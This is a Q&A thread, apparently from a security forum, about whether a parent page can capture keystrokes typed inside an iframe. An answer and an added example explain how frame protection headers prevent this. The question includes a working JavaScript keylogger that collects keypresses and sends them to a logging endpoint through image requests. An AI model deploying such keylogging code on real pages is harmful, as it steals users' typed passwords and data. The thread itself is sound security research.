I am trying to analyze the possibility of accessing keystrokes from an iframe using JavaScript running on the parent page. The potential attack that I am looking to verify is Cross Frame Scripting.

From the OWASP page, I read that the listener in the parent page would get notified only if the keystroke events are from the parent page itself and not the iframe.

  1. Is that always the case?
  2. If the framed content is of same origin, would any of the browsers behave differently?
  3. I have confirmed on Chrome that this attack doesn't work. But is there any alternate way to perform this attack?

This is the JavaScript running on my parent.

var keys='';
var url = 'http://localhost:8883/key?c=';

document.onkeypress = function(e) {
    get = window.event?event:e;
    key = get.keyCode?get.keyCode:get.charCode;
    key = String.fromCharCode(key);
    keys+=key;
}
window.setInterval(function(){
    if(keys.length>0) {
        new Image().src = url+keys;
        keys = '';
    }
}, 1000);
hax

1 Answer

1) Yes

2) No (although plugins could in theory alter this behaviour, but I do not know of any myself)

3) Unless there is a vulnerability exploited in a browser that is yet to be patched, or the use of a malicious/rogue browser, then no, you cannot.

ISMSDEV
With a subscript on all the answers that a user can alter options in most (all?) browsers to disable frame protection – LTPCGO Sep 15 '19 at 03:41
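
On the frame protection mentioned in the comment above: the following is an added example, not part of the original question, answer or comment. It models how a page's own response headers decide whether a given parent may frame it at all. Assumptions: header names are lowercased keys, only one level of framing is considered, `frame-ancestors` sources are limited to `'none'`, `'self'`, `*` and full origins, and the `app.example` / `partner.example` / `other.example` URLs are constructed sample values.

```javascript
// Added example: does this response allow `parentUrl` to embed `pageUrl` in a frame?
// Simplified model (see assumptions in the lead-in); not a full CSP source matcher.
function normalizeOrigin(url) {
  return new URL(url).origin; // lowercases the host and drops default ports
}

// Return the source list of the frame-ancestors directive, or null if absent.
function frameAncestors(csp) {
  for (const directive of (csp || '').split(';')) {
    const [name, ...sources] = directive.trim().split(/\s+/);
    if (name.toLowerCase() === 'frame-ancestors') return sources;
  }
  return null;
}

function canBeFramedBy(pageUrl, parentUrl, headers) {
  const self = normalizeOrigin(pageUrl);
  const parent = normalizeOrigin(parentUrl);
  const sources = frameAncestors(headers['content-security-policy']);
  if (sources !== null) {
    // When frame-ancestors is present it takes precedence over X-Frame-Options.
    // An empty source list matches nothing, which behaves like 'none'.
    return sources.some((s) => {
      const src = s.toLowerCase();
      if (src === "'none'") return false;
      if (src === '*') return true;
      if (src === "'self'") return parent === self;
      try { return normalizeOrigin(src) === parent; } catch { return false; }
    });
  }
  const xfo = (headers['x-frame-options'] || '').trim().toUpperCase();
  if (xfo === 'DENY') return false;
  if (xfo === 'SAMEORIGIN') return parent === self;
  return true; // no frame protection sent: any page may embed this one
}

// Constructed sample: a login page audited against a foreign parent origin.
const page = 'https://app.example/login';
console.log(canBeFramedBy(page, 'https://other.example/', {}));
console.log(canBeFramedBy(page, 'https://other.example/',
  { 'content-security-policy': "default-src 'self'; frame-ancestors 'self'" }));
```

A page that returns `false` here for every foreign origin cannot be loaded inside another site's iframe in the first place, independent of how key events are scoped.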